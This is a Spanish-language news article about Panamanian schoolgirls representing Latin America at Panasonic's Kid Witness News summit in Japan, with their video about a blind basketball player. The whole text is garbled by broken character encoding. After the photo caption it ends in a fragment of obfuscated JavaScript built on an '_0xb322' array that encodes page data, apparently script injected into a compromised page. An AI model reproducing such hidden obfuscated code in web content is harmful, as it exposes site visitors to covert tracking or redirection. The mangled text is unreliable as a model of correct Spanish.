Estudiantes del Instituto Episcopal San CristA?bal de PanamA? participan desde hoy hasta el 5 de agosto del concurso Kid Witness News Global Summit (KWN) 2017 en JapA?n, siendo las A?nicas jA?venes representando a toda LatinoamAi??rica. Se trata de un programa de responsabilidad social de la compaAi??Ai??a japonesa de electrA?nica Panasonic Corporation el cual realiza desde hace 28 aAi??os.

“PanamA? ha participado en cuatro ocasiones y esta vez vamos como invitados especiales. La idea del programa es impulsar el conocimiento, la importancia sobre el medio ambiente, la comunicaciA?n y este aAi??o incluye el tema de los deportes”, seAi??ala MA?nica Leone, portavoz de la marca.

Bajo el concepto “El mundo a travAi??s de sus ojos”, estudiantes de 8 a 15 aAi??os escogen y desarrollan un tema en formato de video con equipos de Panasonic (cA?maras, audAi??fonos) con el fin de fomentar la creatividad, el trabajo en equipo y las habilidades de comunicaciA?n entre los estudiantes de secundaria a nivel mundial, a su vez que fortalece el uso de herramientas de comunicaciA?n, por la diversidad de nacionalidades y la necesidad de expresarse.

Las estudiantes que participaron en la realizaciA?n del video “Siete dAi??as” cursan el dAi??cimo grado de Bachiller en Ciencias y fueron seleccionadas por el colegio y recibieron equipos y capacitaciA?n sobre cA?mo hacer un video en todas las etapas, incluyendo pre-producciA?n, producciA?n y ediciA?n. Ellas son: Joan Villarreal, Estefanie Sierra, Ana OrtAi??z, Maryluz DAi??az y Victoria Lay, bajo la coordinaciA?n de la profesora Damaris GonzA?lez Ruiz.

Sin embargo, solo dos estudiantes y la profesora que dirigiA? el proyecto son las que representan a PanamA? y LatinoamAi??rica hoy en dicho evento. AllAi?? tienen la oportunidad de interactuar con otros representantes de un total de 18 paAi??ses durante cinco dAi??as en el paAi??s nipA?n a travAi??s de actividades interculturales, tales como una visita a Tokio, entrevistar personas, conversatorios e intercambiar ideas para un mejor futuro. Por ello las jA?venes que asistirA?n tienen un dominio fluido del inglAi??s.

Erick Marciscano

Impresiones de las estudiantes y anAi??cdotas

SegA?n comenta la estudiante Maryluz DAi??az escogieron la categorAi??a deporte para innovar, ya que en JapA?n se van a realizar las Olimpiadas Especiales en 2019.

Para el proyecto, captamos la historia de un compaAi??ero que a pesar de que presenta una discapacidad en la vista es muy bueno en basketball. Ai??l aceptA? e hicimos el video que dura 3 minutos, explica Estefanie Sierra.

“Tuvimos que meternos en medio del partido, cuidar el equipo, tratar de que no nos golpearan. Solo tuvimos una oportunidad para hacer las tomas y la ediciA?n tomA? tres dAi??as”, explica sonriente Mariluz DAi??az.

Mientras que Ana Ortiz relata que el video adquiere el nombre ‘Siete dAi??as’ porque la madre del joven en dicho video cuenta que un siete de junio fue que sucediA? el incidente del joven cuando perdiA? la vista. Entonces el diez se refiere al aAi??o y el nA?mero de su camiseta.

La idea de este proyecto es que las estudiantes adquieran conocimiento y Ai??ste les sirva en sus proyectos a futuro, afirma Leone.

MA?nica Leone y estudiantes que asistirA?n al concurso. CortesAi??a

_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}